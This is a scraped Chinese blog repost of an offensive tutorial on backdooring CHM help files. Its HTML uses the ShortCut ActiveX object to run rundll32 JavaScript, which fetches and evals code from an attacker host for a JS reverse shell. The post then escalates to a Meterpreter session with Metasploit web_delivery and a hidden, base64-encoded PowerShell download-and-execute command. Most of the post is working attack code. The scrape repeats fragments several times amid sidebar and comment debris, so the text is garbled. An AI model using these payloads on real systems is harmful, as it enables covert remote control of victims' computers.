chm+JSBackdoor

博主： tangougou
发布时间：2017 年 03 月 08 日
1576次浏览
暂无评论
4501字数
分类： KALI

转载于https://evi1cg.me/archives/chm_backdoor.html

原理：chm启动计算器

代码如下

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

使用JSBackdoor

python MyJSRat.py -i 192.168.1.101 -p 8080

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

将其写入html中代码如下

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

编译以后运行，可以成功获取JS交互shell

此时拿到shell 我们使用meterpreter进行会话

~ msfconsole -Lq
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
msf exploit(web_delivery)

装有powershell的客户端执行以下命令则可获取meterpreter会话

powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');

由于存在特殊字符，我们可以把以上代码编码为base64格式，将以下代码存入power.txt

$n=new-object net.webclient;
$n.proxy=[Net.WebRequest]::GetSystemWebProxy();
$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $n.downloadstring('http://192.168.1.101:8081/');

执行以下命令：

cat power.txt | iconv --to-code UTF-16LE |base64

最终要执行的powershell命令为

powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==

使用执行命令模式直接获取meterpreter会话

python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="

最后修改：2020 年 11 月 03 日 12 : 39 PM

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复

评论 *

私密评论

名称 *

邮箱 *

地址

123
本地？来回244公里？博主你是新疆或是内蒙的吗⌇●﹏●⌇
1
esxi安装的U盘无法用win10访问
影宝宝乖
测试快吐了，%R比%F更好用哦cp -r -s "%R" /L...
影宝宝乖
种子如果单文件可以链接成功，如果是文件夹就不行了，试了一下午快...
chan
你好，我按照上述教程操作之后，emby中可以正常刮削，但是播放...

又上火了
浏览次数: 1027
4月2日再见
浏览次数: 874
沉迷异星工厂无法自拔
浏览次数: 1220
真恶心
浏览次数: 737
斐讯M1成功接入HA
浏览次数: 1975

chm+JSBackdoor

tangougou • 2017 年 03 月 08 日

转载于https://evi1cg.me/archives/chm_backdoor.html

原理：chm启动计算器

代码如下

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

使用JSBackdoor

python MyJSRat.py -i 192.168.1.101 -p 8080

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下

将其写入html中代码如下

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

编译以后运行，可以成功获取JS交互shell

此时拿到shell 我们使用meterpreter进行会话

~ msfconsole -Lq
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
msf exploit(web_delivery)

装有powershell的客户端执行以下命令则可获取meterpreter会话

由于存在特殊字符，我们可以把以上代码编码为base64格式，将以下代码存入power.txt

$n=new-object net.webclient;
$n.proxy=[Net.WebRequest]::GetSystemWebProxy();
$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $n.downloadstring('http://192.168.1.101:8081/');

执行以下命令：

cat power.txt | iconv --to-code UTF-16LE |base64

chm+JSBackdoor

转载于https://evi1cg.me/archives/chm_backdoor.html

原理：chm启动计算器

使用JSBackdoor

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下

将其写入html中代码如下

编译以后运行，可以成功获取JS交互shell

此时拿到shell 我们使用meterpreter进行会话

装有powershell的客户端执行以下命令则可获取meterpreter会话

最终要执行的powershell命令为

使用执行命令模式直接获取meterpreter会话

发表评论取消回复

Mikrotik ROS的Web Proxy

ESXI Fatal error: 33 (Inconsistent data) 无法启动

各种设备的画面采集

群辉下qbit下载完成自动创建软连接

群晖软连接解决emby影响qbit做种问题

又上火了

4月2日再见

沉迷异星工厂无法自拔

真恶心

斐讯M1成功接入HA

chm+JSBackdoor

转载于https://evi1cg.me/archives/chm_backdoor.html

原理：chm启动计算器

使用JSBackdoor

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下

将其写入html中代码如下

编译以后运行，可以成功获取JS交互shell

此时拿到shell 我们使用meterpreter进行会话

装有powershell的客户端执行以下命令则可获取meterpreter会话

最终要执行的powershell命令为

使用执行命令模式直接获取meterpreter会话

转载于https://evi1cg.me/archives/chm_backdoor.html

原理：chm启动计算器

使用JSBackdoor

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下

将其写入html中 代码如下

编译以后运行，可以成功获取JS交互shell

此时拿到shell 我们使用meterpreter进行会话

装有powershell的客户端执行以下命令则可获取meterpreter会话

最终要执行的powershell命令为

使用执行命令模式直接获取meterpreter会话

发表评论 取消回复

chm+JSBackdoor

转载于https://evi1cg.me/archives/chm_backdoor.html

原理：chm启动计算器

使用JSBackdoor

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下

将其写入html中 代码如下

编译以后运行，可以成功获取JS交互shell

此时拿到shell 我们使用meterpreter进行会话

装有powershell的客户端执行以下命令则可获取meterpreter会话

最终要执行的powershell命令为

使用执行命令模式直接获取meterpreter会话

将其写入html中代码如下

发表评论取消回复

将其写入html中代码如下